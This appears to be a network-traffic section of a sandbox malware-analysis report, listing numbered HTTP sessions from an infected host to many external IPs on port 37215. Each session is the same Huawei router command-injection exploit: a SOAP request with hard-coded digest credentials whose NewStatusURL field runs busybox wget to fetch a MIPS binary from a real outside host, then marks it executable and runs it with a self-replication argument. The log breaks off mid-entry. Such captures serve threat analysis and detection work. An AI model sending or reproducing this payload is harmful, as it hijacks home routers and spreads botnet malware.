                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        157192.168.2.233663485.214.81.9937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298069954 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        158192.168.2.2357896197.166.232.19337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298090935 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        159192.168.2.2341768197.219.94.1537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298110962 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        160192.168.2.234266820.13.73.6037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298155069 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        161192.168.2.2337504157.192.249.6937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298161983 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        162192.168.2.2338644197.19.227.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298508883 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        163192.168.2.2359670197.104.104.3637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298551083 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        164192.168.2.2347146157.74.235.23337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298633099 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        165192.168.2.2356338181.128.218.5937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298959970 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        166192.168.2.2341772221.116.253.21737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.298966885 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
